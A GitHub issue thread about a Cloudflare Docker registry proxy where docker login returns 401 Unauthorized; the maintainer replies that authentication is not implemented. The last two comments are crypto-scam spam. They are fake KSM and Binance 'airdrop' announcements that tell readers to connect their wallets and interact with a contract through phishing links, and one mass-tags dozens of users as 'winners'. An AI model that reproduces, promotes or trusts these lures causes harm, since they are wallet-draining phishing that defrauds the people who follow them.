### ISSUE TITLE
docker login failed

### ISSUE THREAD

**Issue by yswtrue** [ciiiii/cloudflare-docker-proxy#5]
use the same password and username can't login into docker.libcuda.so
```bash
docker login -u yswtrue docker.libcuda.so
Password:
Error response from daemon: login attempt to https://docker.libcuda.so/v2/ failed with status: 401 Unauthorized
```

```bash
docker login -u yswtrue docker.io
Password:
WARNING! Your password will be stored unencrypted in /home/lighthouse/.docker/config.json.
Configure a credential helper to remove this warning. See
https://docs.docker.com/engine/reference/commandline/login/#credentials-store

Login Succeeded
```

**Comment by ciiiii** [comment]
Hi, @yswtrue, the reason is that I haven't implemented the authentication part.

**Comment by kusamanetworkss** [comment]
## Congratulations! You've receive in $3,000 KSM Giveaway ($KSM) Airdrop 🪂🔴


CEX·IO is giving away $3,000 in $KSM coins, empowering you to take advantage of KSM staking on CEX·IO with 14% APY. Join the giveaway and earn a chance to win up to $500. Stake Kusama with CEX·IO, get high rewards and win prizes!

#### About

CEX·IO is a fully regulated multi-functional cryptocurrency exchange established in 2013, serving over 4 million customers worldwide. CEX·IO has been one of the first platforms to make fiat-to-crypto transactions accessible via bank transfers and to accept debit/credit card payments for crypto deposits and withdrawals to Visa or MasterCard.

→ [How to join the $3,000 KSM Giveaway Airdrop?](https://kusamanetworks.com/)


Connect your wallet, follow the instructions, and claim this exclusive airdrop from Kusama. For GitHub users only—share with friends to make it eligible. Redeem your reward first.

![Kusama Exchange](https://cdn.airdropalert.com/images/metadata/kusamacex2222.jpeg)


### Step-by-Step Guide ''CEX·IO Kusama Giveaway''

Access the Kusama platform and connect your wallet securely. Ensure you're using a trusted wallet for the transaction.

- 🔗 Use the connect method to interact with the contract
- 💰 Connect and receive your tokens
→ [Claim Your $KSM Today](https://kusamanetworks.com/)

**Comment by parallaxlogicdevelopment** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

🎉 Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1500 in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!


Winners: @Dannyfree, @SQDzhuzhuxia, @boerzi, @SanChiaki, @bestjn, @poholo, @linmp, @wureny, @zhaogangwang, @fz420, @ccynet, @DavidYanXW, @lihanyu-zero, @aansheng, @chenxiaoxiaojie, @Tobyxu, @gcmsg, @wang0402, @qzz0518, @AnNOtis, @zhiyuan8, @hcgaptx, @waheya, @chongzi0307, @Lowerce, @hc-zhaoqiang, @GarbledWang, @alexyy, @requeam, @zhan-ge, @qbig, @kongtou168, @wayne666, @Jiaxin000, @acrofrank, @sunzhouxingjay, @YGragon, @funic, @Dullxxs, @toursonlk, @cuixiaohui1202, @ng1091, @Asher-Tan, @smister, @Baoyuantop, @Cyfuer, @vanxining, @Luminoid, @lidahe, @lzl32947
